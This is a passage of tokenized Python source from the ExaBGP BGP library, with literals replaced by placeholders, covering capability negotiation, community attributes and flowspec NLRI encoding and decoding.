CAPABILITIES = <NUM_LIT> <EOL> def __str__ ( self ) : <EOL> if self == <NUM_LIT> : <EOL> return "<STR_LIT>" <EOL> if self == <NUM_LIT> : <EOL> return "<STR_LIT>" <EOL> return '<STR_LIT>' <EOL> class Capabilities ( dict ) : <EOL> def announced ( self , capability ) : <EOL> return capability in self <EOL> def __str__ ( self ) : <EOL> r = [ ] <EOL> for key in sorted ( self . keys ( ) ) : <EOL> r . append ( str ( self [ key ] ) ) <EOL> return '<STR_LIT:U+002CU+0020>' . join ( r ) <EOL> def _protocol ( self , neighbor ) : <EOL> families = neighbor . families ( ) <EOL> mp = MultiProtocol ( ) <EOL> mp . extend ( families ) <EOL> self [ Capability . CODE . MULTIPROTOCOL ] = mp <EOL> def _asn4 ( self , neighbor ) : <EOL> if not neighbor . asn4 : <EOL> return <EOL> self [ Capability . CODE . FOUR_BYTES_ASN ] = ASN4 ( neighbor . local_as ) <EOL> def _addpath ( self , neighbor ) : <EOL> if not neighbor . 
add_path : <EOL> return <EOL> families = neighbor . families ( ) <EOL> ap_families = [ ] <EOL> if ( AFI ( AFI . ipv4 ) , SAFI ( SAFI . unicast ) ) in families : <EOL> ap_families . append ( ( AFI ( AFI . ipv4 ) , SAFI ( SAFI . unicast ) ) ) <EOL> if ( AFI ( AFI . ipv6 ) , SAFI ( SAFI . unicast ) ) in families : <EOL> ap_families . append ( ( AFI ( AFI . ipv6 ) , SAFI ( SAFI . unicast ) ) ) <EOL> if ( AFI ( AFI . ipv4 ) , SAFI ( SAFI . nlri_mpls ) ) in families : <EOL> ap_families . append ( ( AFI ( AFI . ipv4 ) , SAFI ( SAFI . nlri_mpls ) ) ) <EOL> if ( AFI ( AFI . ipv6 ) , SAFI ( SAFI . unicast ) ) in families : <EOL> ap_families . append ( ( AFI ( AFI . ipv6 ) , SAFI ( SAFI . unicast ) ) ) <EOL> self [ Capability . CODE . ADD_PATH ] = AddPath ( ap_families , neighbor . add_path ) <EOL> def _graceful ( self , neighbor , restarted ) : <EOL> if not neighbor . graceful_restart : <EOL> return <EOL> self [ Capability . CODE . GRACEFUL_RESTART ] = Graceful ( ) . set ( <EOL> Graceful . RESTART_STATE if restarted else <NUM_LIT> , <EOL> neighbor . graceful_restart , <EOL> [ ( afi , safi , Graceful . FORWARDING_STATE ) for ( afi , safi ) in neighbor . families ( ) ] <EOL> ) <EOL> def _refresh ( self , neighbor ) : <EOL> if not neighbor . route_refresh : <EOL> return <EOL> self [ Capability . CODE . ROUTE_REFRESH ] = RouteRefresh ( ) <EOL> self [ Capability . CODE . ENHANCED_ROUTE_REFRESH ] = EnhancedRouteRefresh ( ) <EOL> def _hostname ( self , neighbor ) : <EOL> self [ Capability . CODE . HOSTNAME ] = HostName ( neighbor . host_name , neighbor . domain_name ) <EOL> def _operational ( self , neighbor ) : <EOL> if not neighbor . operational : <EOL> return <EOL> self [ Capability . CODE . OPERATIONAL ] = Operational ( ) <EOL> def _session ( self , neighbor ) : <EOL> if not neighbor . multisession : <EOL> return <EOL> self [ Capability . CODE . MULTISESSION ] = MultiSession ( ) . set ( [ Capability . CODE . 
MULTIPROTOCOL ] ) <EOL> def new ( self , neighbor , restarted ) : <EOL> self . _protocol ( neighbor ) <EOL> self . _asn4 ( neighbor ) <EOL> self . _addpath ( neighbor ) <EOL> self . _graceful ( neighbor , restarted ) <EOL> self . _refresh ( neighbor ) <EOL> self . _operational ( neighbor ) <EOL> self . _session ( neighbor ) <EOL> return self <EOL> def pack ( self ) : <EOL> rs = [ ] <EOL> for k , capabilities in self . iteritems ( ) : <EOL> for capability in capabilities . extract ( ) : <EOL> rs . append ( "<STR_LIT>" % ( chr ( k ) , chr ( len ( capability ) ) , capability ) ) <EOL> parameters = "<STR_LIT>" . join ( [ "<STR_LIT>" % ( chr ( <NUM_LIT:2> ) , chr ( len ( r ) ) , r ) for r in rs ] ) <EOL> return "<STR_LIT>" % ( chr ( len ( parameters ) ) , parameters ) <EOL> @ staticmethod <EOL> def unpack ( data ) : <EOL> def _key_values ( name , data ) : <EOL> if len ( data ) < <NUM_LIT:2> : <EOL> raise Notify ( <NUM_LIT:2> , <NUM_LIT:0> , "<STR_LIT>" % ( name , Capability . hex ( data ) ) ) <EOL> l = ord ( data [ <NUM_LIT:1> ] ) <EOL> boundary = l + <NUM_LIT:2> <EOL> if len ( data ) < boundary : <EOL> raise Notify ( <NUM_LIT:2> , <NUM_LIT:0> , "<STR_LIT>" % ( name , Capability . hex ( data ) ) ) <EOL> key = ord ( data [ <NUM_LIT:0> ] ) <EOL> value = data [ <NUM_LIT:2> : boundary ] <EOL> rest = data [ boundary : ] <EOL> return key , value , rest <EOL> capabilities = Capabilities ( ) <EOL> option_len = ord ( data [ <NUM_LIT:0> ] ) <EOL> if option_len : <EOL> data = data [ <NUM_LIT:1> : ] <EOL> while data : <EOL> key , value , data = _key_values ( '<STR_LIT>' , data ) <EOL> if key == Parameter . AUTHENTIFICATION_INFORMATION : <EOL> raise Notify ( <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> if key == Parameter . CAPABILITIES : <EOL> while value : <EOL> capability , capv , value = _key_values ( '<STR_LIT>' , value ) <EOL> capabilities [ capability ] = Capability . 
unpack ( capability , capabilities , capv ) <EOL> else : <EOL> raise Notify ( <NUM_LIT:2> , <NUM_LIT:0> , '<STR_LIT>' % hex ( key ) ) <EOL> return capabilities </s>
<s> """<STR_LIT>""" <EOL> from struct import pack <EOL> from struct import unpack <EOL> class Community ( object ) : <EOL> MAX = <NUM_LIT> <EOL> NO_EXPORT = pack ( '<STR_LIT>' , <NUM_LIT> ) <EOL> NO_ADVERTISE = pack ( '<STR_LIT>' , <NUM_LIT> ) <EOL> NO_EXPORT_SUBCONFED = pack ( '<STR_LIT>' , <NUM_LIT> ) <EOL> NO_PEER = pack ( '<STR_LIT>' , <NUM_LIT> ) <EOL> cache = { } <EOL> caching = True <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , community ) : <EOL> self . community = community <EOL> if community == self . NO_EXPORT : <EOL> self . _str = '<STR_LIT>' <EOL> elif community == self . NO_ADVERTISE : <EOL> self . _str = '<STR_LIT>' <EOL> elif community == self . NO_EXPORT_SUBCONFED : <EOL> self . _str = '<STR_LIT>' <EOL> else : <EOL> self . _str = "<STR_LIT>" % unpack ( '<STR_LIT>' , self . community ) <EOL> def __eq__ ( self , other ) : <EOL> return self . community == other . community <EOL> def __ne__ ( self , other ) : <EOL> return self . community != other . community <EOL> def __lt__ ( self , other ) : <EOL> return self . community < other . community <EOL> def __le__ ( self , other ) : <EOL> return self . community <= other . community <EOL> def __gt__ ( self , other ) : <EOL> return self . community > other . community <EOL> def __ge__ ( self , other ) : <EOL> return self . community >= other . community <EOL> def json ( self ) : <EOL> return "<STR_LIT>" % unpack ( '<STR_LIT>' , self . community ) <EOL> def pack ( self , negotiated = None ) : <EOL> return self . community <EOL> def __repr__ ( self ) : <EOL> return self . _str <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:4> <EOL> @ classmethod <EOL> def unpack ( cls , community , negotiated ) : <EOL> return cls ( community ) <EOL> @ classmethod <EOL> def cached ( cls , community ) : <EOL> if cls . caching and community in cls . cache : <EOL> return cls . cache [ community ] <EOL> instance = cls ( community ) <EOL> if cls . caching : <EOL> cls . 
cache [ community ] = instance <EOL> return instance <EOL> if not Community . cache : <EOL> Community . cache [ Community . NO_EXPORT ] = Community ( Community . NO_EXPORT ) <EOL> Community . cache [ Community . NO_ADVERTISE ] = Community ( Community . NO_ADVERTISE ) <EOL> Community . cache [ Community . NO_EXPORT_SUBCONFED ] = Community ( Community . NO_EXPORT_SUBCONFED ) <EOL> Community . cache [ Community . NO_PEER ] = Community ( Community . NO_PEER ) </s>
<s> """<STR_LIT>""" <EOL> from struct import pack <EOL> from struct import unpack <EOL> from exabgp . protocol . ip import NoNextHop <EOL> from exabgp . protocol . family import AFI <EOL> from exabgp . protocol . family import SAFI <EOL> from exabgp . bgp . message . direction import OUT <EOL> from exabgp . bgp . message . notification import Notify <EOL> from exabgp . bgp . message . update . nlri . cidr import CIDR <EOL> from exabgp . protocol import Protocol <EOL> from exabgp . protocol . ip . icmp import ICMPType <EOL> from exabgp . protocol . ip . icmp import ICMPCode <EOL> from exabgp . protocol . ip . fragment import Fragment <EOL> from exabgp . protocol . ip . tcp . flag import TCPFlag <EOL> from exabgp . bgp . message . update . nlri . nlri import NLRI <EOL> from exabgp . bgp . message . update . nlri . qualifier import RouteDistinguisher <EOL> class IComponent ( object ) : <EOL> FLAG = False <EOL> class CommonOperator ( object ) : <EOL> power = { <NUM_LIT:0> : <NUM_LIT:1> , <NUM_LIT:1> : <NUM_LIT:2> , <NUM_LIT:2> : <NUM_LIT:4> , <NUM_LIT:3> : <NUM_LIT:8> , } <EOL> rewop = { <NUM_LIT:1> : <NUM_LIT:0> , <NUM_LIT:2> : <NUM_LIT:1> , <NUM_LIT:4> : <NUM_LIT:2> , <NUM_LIT:8> : <NUM_LIT:3> , } <EOL> len_position = <NUM_LIT> <EOL> EOL = <NUM_LIT> <EOL> AND = <NUM_LIT> <EOL> LEN = <NUM_LIT> <EOL> NOP = <NUM_LIT> <EOL> OPERATOR = <NUM_LIT> ^ ( EOL | LEN ) <EOL> @ staticmethod <EOL> def eol ( data ) : <EOL> return data & CommonOperator . EOL <EOL> @ staticmethod <EOL> def operator ( data ) : <EOL> return data & CommonOperator . OPERATOR <EOL> @ staticmethod <EOL> def length ( data ) : <EOL> return <NUM_LIT:1> << ( ( data & CommonOperator . LEN ) >> <NUM_LIT:4> ) <EOL> class NumericOperator ( CommonOperator ) : <EOL> LT = <NUM_LIT> <EOL> GT = <NUM_LIT> <EOL> EQ = <NUM_LIT> <EOL> class BinaryOperator ( CommonOperator ) : <EOL> NOT = <NUM_LIT> <EOL> MATCH = <NUM_LIT> <EOL> INCLUDE = <NUM_LIT> <EOL> def _len_to_bit ( value ) : <EOL> return NumericOperator . 
rewop [ value ] << <NUM_LIT:4> <EOL> def _bit_to_len ( value ) : <EOL> return NumericOperator . power [ ( value & CommonOperator . len_position ) >> <NUM_LIT:4> ] <EOL> def _number ( string ) : <EOL> value = <NUM_LIT:0> <EOL> for c in string : <EOL> value = ( value << <NUM_LIT:8> ) + ord ( c ) <EOL> return value <EOL> class IPv4 ( object ) : <EOL> afi = AFI . ipv4 <EOL> class IPv6 ( object ) : <EOL> afi = AFI . ipv6 <EOL> class IPrefix ( object ) : <EOL> pass <EOL> class IPrefix4 ( IPrefix , IComponent , IPv4 ) : <EOL> CODE = - <NUM_LIT:1> <EOL> NAME = '<STR_LIT>' <EOL> operations = <NUM_LIT> <EOL> def __init__ ( self , raw , netmask ) : <EOL> self . cidr = CIDR ( raw , netmask ) <EOL> def pack ( self ) : <EOL> raw = self . cidr . pack_nlri ( ) <EOL> return "<STR_LIT>" % ( chr ( self . ID ) , raw ) <EOL> def __str__ ( self ) : <EOL> return str ( self . cidr ) <EOL> @ classmethod <EOL> def make ( cls , bgp ) : <EOL> prefix , mask = CIDR . decode ( AFI . ipv4 , bgp ) <EOL> return cls ( prefix , mask ) , bgp [ CIDR . size ( mask ) + <NUM_LIT:1> : ] <EOL> class IPrefix6 ( IPrefix , IComponent , IPv6 ) : <EOL> CODE = - <NUM_LIT:1> <EOL> NAME = '<STR_LIT>' <EOL> operations = <NUM_LIT> <EOL> def __init__ ( self , raw , netmask , offset ) : <EOL> self . cidr = CIDR ( raw , netmask ) <EOL> self . offset = offset <EOL> def pack ( self ) : <EOL> return "<STR_LIT>" % ( chr ( self . ID ) , chr ( self . cidr . mask ) , chr ( self . offset ) , self . cidr . pack_ip ( ) ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . cidr , self . offset ) <EOL> @ classmethod <EOL> def make ( cls , bgp ) : <EOL> offset = ord ( bgp [ <NUM_LIT:1> ] ) <EOL> prefix , mask = CIDR . decode ( AFI . ipv6 , bgp [ <NUM_LIT:0> ] + bgp [ <NUM_LIT:2> : ] ) <EOL> return cls ( prefix , mask , offset ) , bgp [ CIDR . size ( mask ) + <NUM_LIT:2> : ] <EOL> class IOperation ( IComponent ) : <EOL> def __init__ ( self , operations , value ) : <EOL> self . operations = operations <EOL> self . 
value = value <EOL> self . first = None <EOL> def pack ( self ) : <EOL> l , v = self . encode ( self . value ) <EOL> op = self . operations | _len_to_bit ( l ) <EOL> return "<STR_LIT>" % ( chr ( op ) , v ) <EOL> def encode ( self , value ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def decode ( self , value ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class IOperationByte ( IOperation ) : <EOL> def encode ( self , value ) : <EOL> return <NUM_LIT:1> , chr ( value ) <EOL> def decode ( self , bgp ) : <EOL> return ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> class IOperationByteShort ( IOperation ) : <EOL> def encode ( self , value ) : <EOL> if value < ( <NUM_LIT:1> << <NUM_LIT:8> ) : <EOL> return <NUM_LIT:1> , chr ( value ) <EOL> return <NUM_LIT:2> , pack ( '<STR_LIT>' , value ) <EOL> def decode ( self , bgp ) : <EOL> return unpack ( '<STR_LIT>' , bgp [ : <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] , bgp [ <NUM_LIT:2> : ] <EOL> class NumericString ( object ) : <EOL> OPERATION = '<STR_LIT>' <EOL> operations = None <EOL> value = None <EOL> _string = { <EOL> NumericOperator . LT : '<STR_LIT:<>' , <EOL> NumericOperator . GT : '<STR_LIT:>>' , <EOL> NumericOperator . EQ : '<STR_LIT:=>' , <EOL> NumericOperator . LT | NumericOperator . EQ : '<STR_LIT>' , <EOL> NumericOperator . GT | NumericOperator . EQ : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . LT : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . GT : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . EQ : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . LT | NumericOperator . EQ : '<STR_LIT>' , <EOL> NumericOperator . AND | NumericOperator . GT | NumericOperator . EQ : '<STR_LIT>' , <EOL> } <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . _string [ self . operations & ( CommonOperator . EOL ^ <NUM_LIT> ) ] , self . 
value ) <EOL> class BinaryString ( object ) : <EOL> OPERATION = '<STR_LIT>' <EOL> operations = None <EOL> value = None <EOL> _string = { <EOL> BinaryOperator . INCLUDE : '<STR_LIT>' , <EOL> BinaryOperator . NOT : '<STR_LIT:!>' , <EOL> BinaryOperator . MATCH : '<STR_LIT:=>' , <EOL> BinaryOperator . AND | BinaryOperator . NOT : '<STR_LIT>' , <EOL> BinaryOperator . AND | BinaryOperator . MATCH : '<STR_LIT>' , <EOL> } <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . _string [ self . operations & ( CommonOperator . EOL ^ <NUM_LIT> ) ] , self . value ) <EOL> def converter ( function , klass = None ) : <EOL> def _integer ( value ) : <EOL> if klass is None : <EOL> return function ( value ) <EOL> try : <EOL> return klass ( value ) <EOL> except ValueError : <EOL> return function ( value ) <EOL> return _integer <EOL> def decoder ( function , klass = int ) : <EOL> def _inner ( value ) : <EOL> return klass ( function ( value ) ) <EOL> return _inner <EOL> def PacketLength ( data ) : <EOL> _str_bad_length = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_length ) <EOL> return number <EOL> def PortValue ( data ) : <EOL> _str_bad_port = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number < <NUM_LIT:0> or number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_port ) <EOL> return number <EOL> def DSCPValue ( data ) : <EOL> _str_bad_dscp = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number < <NUM_LIT:0> or number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_dscp ) <EOL> return number <EOL> def ClassValue ( data ) : <EOL> _str_bad_class = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number < <NUM_LIT:0> or number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_class ) <EOL> return number <EOL> def LabelValue ( data ) : <EOL> _str_bad_label = "<STR_LIT>" <EOL> number = int ( data ) <EOL> if number < <NUM_LIT:0> or number > <NUM_LIT> : <EOL> raise ValueError ( _str_bad_label ) <EOL> return number 
<EOL> class FlowDestination ( object ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> class FlowSource ( object ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT:source>' <EOL> class Flow4Destination ( IPrefix4 , FlowDestination ) : <EOL> NAME = '<STR_LIT>' <EOL> class Flow4Source ( IPrefix4 , FlowSource ) : <EOL> NAME = '<STR_LIT>' <EOL> class Flow6Destination ( IPrefix6 , FlowDestination ) : <EOL> NAME = '<STR_LIT>' <EOL> class Flow6Source ( IPrefix6 , FlowSource ) : <EOL> NAME = '<STR_LIT>' <EOL> class FlowIPProtocol ( IOperationByte , NumericString , IPv4 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( Protocol . named , Protocol ) ) <EOL> decoder = staticmethod ( decoder ( ord , Protocol ) ) <EOL> class FlowNextHeader ( IOperationByte , NumericString , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( Protocol . named , Protocol ) ) <EOL> decoder = staticmethod ( decoder ( ord , Protocol ) ) <EOL> class FlowAnyPort ( IOperationByteShort , NumericString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT:port>' <EOL> converter = staticmethod ( converter ( PortValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowDestinationPort ( IOperationByteShort , NumericString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( PortValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowSourcePort ( IOperationByteShort , NumericString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( PortValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowICMPType ( IOperationByte , BinaryString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( ICMPType . 
named ) ) <EOL> decoder = staticmethod ( decoder ( _number , ICMPType ) ) <EOL> class FlowICMPCode ( IOperationByte , BinaryString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( ICMPCode . named ) ) <EOL> decoder = staticmethod ( decoder ( _number , ICMPCode ) ) <EOL> class FlowTCPFlag ( IOperationByte , BinaryString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> FLAG = True <EOL> converter = staticmethod ( converter ( TCPFlag . named ) ) <EOL> decoder = staticmethod ( decoder ( ord , TCPFlag ) ) <EOL> class FlowPacketLength ( IOperationByteShort , NumericString , IPv4 , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( PacketLength ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowDSCP ( IOperationByteShort , NumericString , IPv4 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( DSCPValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowTrafficClass ( IOperationByte , NumericString , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( ClassValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> class FlowFragment ( IOperationByteShort , BinaryString , IPv4 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> FLAG = True <EOL> converter = staticmethod ( converter ( Fragment . named ) ) <EOL> decoder = staticmethod ( decoder ( ord , Fragment ) ) <EOL> class FlowFlowLabel ( IOperationByteShort , NumericString , IPv6 ) : <EOL> ID = <NUM_LIT> <EOL> NAME = '<STR_LIT>' <EOL> converter = staticmethod ( converter ( LabelValue ) ) <EOL> decoder = staticmethod ( _number ) <EOL> decode = { AFI . ipv4 : { } , AFI . ipv6 : { } } <EOL> factory = { AFI . ipv4 : { } , AFI . ipv6 : { } } <EOL> for content in dir ( ) : <EOL> kls = globals ( ) . 
get ( content , None ) <EOL> if not isinstance ( kls , type ( IComponent ) ) : <EOL> continue <EOL> if not issubclass ( kls , IComponent ) : <EOL> continue <EOL> if issubclass ( kls , IPv4 ) : <EOL> _afi = AFI . ipv4 <EOL> elif issubclass ( kls , IPv6 ) : <EOL> _afi = AFI . ipv6 <EOL> else : <EOL> continue <EOL> _ID = getattr ( kls , '<STR_LIT>' , None ) <EOL> if not _ID : <EOL> continue <EOL> factory [ _afi ] [ _ID ] = kls <EOL> name = getattr ( kls , '<STR_LIT>' ) <EOL> if issubclass ( kls , IOperation ) : <EOL> if issubclass ( kls , BinaryString ) : <EOL> decode [ _afi ] [ _ID ] = '<STR_LIT>' <EOL> elif issubclass ( kls , NumericString ) : <EOL> decode [ _afi ] [ _ID ] = '<STR_LIT>' <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> elif issubclass ( kls , IPrefix ) : <EOL> decode [ _afi ] [ _ID ] = '<STR_LIT>' <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def _unique ( ) : <EOL> value = <NUM_LIT:0> <EOL> while True : <EOL> yield value <EOL> value += <NUM_LIT:1> <EOL> unique = _unique ( ) <EOL> @ NLRI . register ( AFI . ipv4 , SAFI . flow_ip ) <EOL> @ NLRI . register ( AFI . ipv6 , SAFI . flow_ip ) <EOL> @ NLRI . register ( AFI . ipv4 , SAFI . flow_vpn ) <EOL> @ NLRI . register ( AFI . ipv6 , SAFI . flow_vpn ) <EOL> class Flow ( NLRI ) : <EOL> def __init__ ( self , afi = AFI . ipv4 , safi = SAFI . flow_ip , action = OUT . UNSET ) : <EOL> NLRI . __init__ ( self , afi , safi , action ) <EOL> self . rules = { } <EOL> self . nexthop = NoNextHop <EOL> self . rd = RouteDistinguisher . NORD <EOL> self . unique = unique . next ( ) <EOL> def __eq__ ( self , other ) : <EOL> return self . rules == other . rules and self . action == other . action and self . nexthop == other . nexthop and self . rd == other . rd <EOL> def __ne__ ( self , other ) : <EOL> return not self . 
__eq__ ( other ) <EOL> def __lt__ ( self , other ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def __le__ ( self , other ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def __gt__ ( self , other ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def __ge__ ( self , other ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> def __len__ ( self ) : <EOL> return len ( self . pack ( ) ) <EOL> def add ( self , rule ) : <EOL> ID = rule . ID <EOL> if ID in ( FlowDestination . ID , FlowSource . ID ) : <EOL> if ID in self . rules : <EOL> return False <EOL> if ID == FlowDestination . ID : <EOL> pair = self . rules . get ( FlowSource . ID , [ ] ) <EOL> else : <EOL> pair = self . rules . get ( FlowDestination . ID , [ ] ) <EOL> if pair : <EOL> if rule . afi != pair [ <NUM_LIT:0> ] . afi : <EOL> return False <EOL> if rule . NAME . endswith ( '<STR_LIT>' ) : <EOL> self . afi = AFI ( AFI . ipv6 ) <EOL> self . rules . setdefault ( ID , [ ] ) . append ( rule ) <EOL> return True <EOL> def pack ( self , negotiated = None ) : <EOL> ordered_rules = [ ] <EOL> for ID in sorted ( self . rules . keys ( ) ) : <EOL> rules = self . rules [ ID ] <EOL> for rule in rules : <EOL> rule . operations &= ( CommonOperator . EOL ^ <NUM_LIT> ) <EOL> rules [ - <NUM_LIT:1> ] . operations |= CommonOperator . EOL <EOL> if ID not in ( FlowDestination . ID , FlowSource . ID ) : <EOL> ordered_rules . append ( chr ( ID ) ) <EOL> ordered_rules . append ( '<STR_LIT>' . join ( rule . pack ( ) for rule in rules ) ) <EOL> components = self . rd . pack ( ) + '<STR_LIT>' . join ( ordered_rules ) <EOL> l = len ( components ) <EOL> if l < <NUM_LIT> : <EOL> return "<STR_LIT>" % ( chr ( l ) , components ) <EOL> if l < <NUM_LIT> : <EOL> return "<STR_LIT>" % ( pack ( '<STR_LIT>' , l | <NUM_LIT> ) , components ) <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> def extensive ( self ) : <EOL> string = [ ] <EOL> for index in sorted ( self . rules ) : <EOL> rules = self . 
rules [ index ] <EOL> s = [ ] <EOL> for idx , rule in enumerate ( rules ) : <EOL> if idx and not rule . operations & NumericOperator . AND : <EOL> s . append ( '<STR_LIT:U+0020>' ) <EOL> s . append ( rule ) <EOL> line = '<STR_LIT>' . join ( str ( _ ) for _ in s ) <EOL> if len ( s ) > <NUM_LIT:1> : <EOL> line = '<STR_LIT>' % line <EOL> string . append ( '<STR_LIT>' % ( rules [ <NUM_LIT:0> ] . NAME , line ) ) <EOL> nexthop = '<STR_LIT>' % self . nexthop if self . nexthop is not NoNextHop else '<STR_LIT>' <EOL> rd = '<STR_LIT>' if self . rd is RouteDistinguisher . NORD else str ( self . rd ) <EOL> return '<STR_LIT>' + '<STR_LIT>' . join ( string ) + rd + nexthop <EOL> def __str__ ( self ) : <EOL> return self . extensive ( ) <EOL> def _json ( self ) : <EOL> string = [ ] <EOL> for index in sorted ( self . rules ) : <EOL> rules = self . rules [ index ] <EOL> s = [ ] <EOL> for idx , rule in enumerate ( rules ) : <EOL> if idx and not rule . operations & NumericOperator . AND : <EOL> s . append ( '<STR_LIT:U+002CU+0020>' ) <EOL> if rule . FLAG : <EOL> s . append ( '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % flag for flag in rule . value . named_bits ( ) ) ) <EOL> else : <EOL> s . append ( '<STR_LIT>' % rule ) <EOL> string . append ( '<STR_LIT>' % ( rules [ <NUM_LIT:0> ] . NAME , '<STR_LIT>' . join ( str ( _ ) for _ in s ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> nexthop = '<STR_LIT>' % self . nexthop if self . nexthop is not NoNextHop else '<STR_LIT>' <EOL> rd = '<STR_LIT>' if self . rd is RouteDistinguisher . NORD else '<STR_LIT>' % self . rd . json ( ) <EOL> compatibility = '<STR_LIT>' % self . extensive ( ) <EOL> return '<STR_LIT:{>' + '<STR_LIT:U+002C>' . join ( string ) + rd + nexthop + compatibility + '<STR_LIT>' <EOL> def json ( self ) : <EOL> return '<STR_LIT>' % ( self . unique , self . _json ( ) ) <EOL> def index ( self ) : <EOL> return self . 
pack ( ) <EOL> @ classmethod <EOL> def unpack_nlri ( cls , afi , safi , bgp , action , addpath ) : <EOL> length , bgp = ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> if length & <NUM_LIT> == <NUM_LIT> : <EOL> extra , bgp = ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> length = ( ( length & <NUM_LIT> ) << <NUM_LIT:16> ) + extra <EOL> if length > len ( bgp ) : <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:10> , '<STR_LIT>' ) <EOL> over = bgp [ length : ] <EOL> bgp = bgp [ : length ] <EOL> nlri = Flow ( afi , safi , action ) <EOL> if safi == SAFI . flow_vpn : <EOL> nlri . rd = RouteDistinguisher ( bgp [ : <NUM_LIT:8> ] ) <EOL> bgp = bgp [ <NUM_LIT:8> : ] <EOL> seen = [ ] <EOL> while bgp : <EOL> what , bgp = ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> if what not in decode . get ( afi , { } ) : <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:10> , '<STR_LIT>' % what ) <EOL> seen . append ( what ) <EOL> if sorted ( seen ) != seen : <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:10> , '<STR_LIT>' % seen ) <EOL> decoded = decode [ afi ] [ what ] <EOL> klass = factory [ afi ] [ what ] <EOL> if decoded == '<STR_LIT>' : <EOL> adding , bgp = klass . make ( bgp ) <EOL> if not nlri . add ( adding ) : <EOL> raise Notify ( <NUM_LIT:3> , <NUM_LIT:10> , '<STR_LIT>' % seen ) <EOL> else : <EOL> end = False <EOL> while not end : <EOL> byte , bgp = ord ( bgp [ <NUM_LIT:0> ] ) , bgp [ <NUM_LIT:1> : ] <EOL> end = CommonOperator . eol ( byte ) <EOL> operator = CommonOperator . operator ( byte ) <EOL> length = CommonOperator . length ( byte ) <EOL> value , bgp = bgp [ : length ] , bgp [ length : ] <EOL> adding = klass . decoder ( value ) <EOL> nlri . add ( klass ( operator , adding ) ) <EOL> return nlri , bgp + over </s>
